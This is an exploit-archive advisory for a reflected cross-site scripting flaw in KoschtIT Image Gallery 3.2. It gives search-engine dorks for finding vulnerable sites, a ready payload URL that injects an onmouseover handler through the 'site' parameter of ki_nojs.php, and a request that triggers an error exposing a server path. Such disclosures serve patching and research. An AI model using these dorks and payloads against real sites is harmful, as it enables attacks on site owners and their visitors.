KoschtIT Image Gallery 3.2 Cross Site Scripting

2014.11.13

Credit: TheMirkin

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: inur:ki_nojs.php?gallery

?#########################################################################
# __ .__ .__ #
# |__|____ ____ |__| ______ ___________ _______|__| ____ ______ #
# | \__ \ / \| |/ ___// ___/\__ \\_ __ \ |/ __ \ / ___/ #
# | |/ __ \| | \ |\___ \ \___ \ / __ \| | \/ \ ___/ \___ \ #
#/\__| (____ /___| /__/____ >____ >(____ /__| |__|\___ >____ > #
#\______| \/ \/ \/ \/ \/ \/ \/ #
# www.janissaries.org #
##=====================================================================##
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
???:??? koschtit_image_gallery(v3.2) Cross Site Scripting ???:???
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
./Title Exploit : KoschtIT Image Gallery Cross Site Scripting [XSS]
./WebApps URL : http://koschtit.tabere.net/en/#download
./Author Exploit: [ TheMirkin ] [ th3mirkin@gmail.com.com ] [ All Janissaries ]
./Security Risk : [ High Level ]
./Category XPL : [ WebApps]
./Time & Date : 11.12.2014. 09:55 PM.
./Tested on: [Windos 8]
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#################################################################################
#
#
# Dork : inur:ki_nojs.php?gallery
# inurl:ki_base
#
# #=> Exploit: Cross Site Scripting [XSS]
# This vulnerability affects
File : ki_base/ki_nojs.php
# GET input site was set to ' onmouseover=prompt(956927) bad='
# Demo:
# http://[rarget]/ki_base/ki_nojs.php?gallery=gallery2&site=%27%20onmouseover%3dprompt%28956927%29%20bad%3d%27&startfrom=1
#
# #=> Application error message
# ki_nojs.php?gallery=gallery2&site=/en/&startfrom[]=18
# http://[rarget]/ki_base/ki_nojs.php?gallery=gallery2&site=/en/&startfrom[]=18
Fatal error: Unsupported operand types in /home/user/publis_html/script/ki_base/ki_nojs.php on line 365
#
#
# xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[ Thanks For All ]xxxxxxxxxxxxxxxxxxxxxxxxxxxxx #
# Special Thanks : Burtay and All Janissaries Team(Burtay,B127Y,Miyachung,3spi0n,TheMirkin,Michelony)
#################################################################################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

KoschtIT Image Gallery 3.2 Cross Site Scripting

Dork: inur:ki_nojs.php?gallery

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.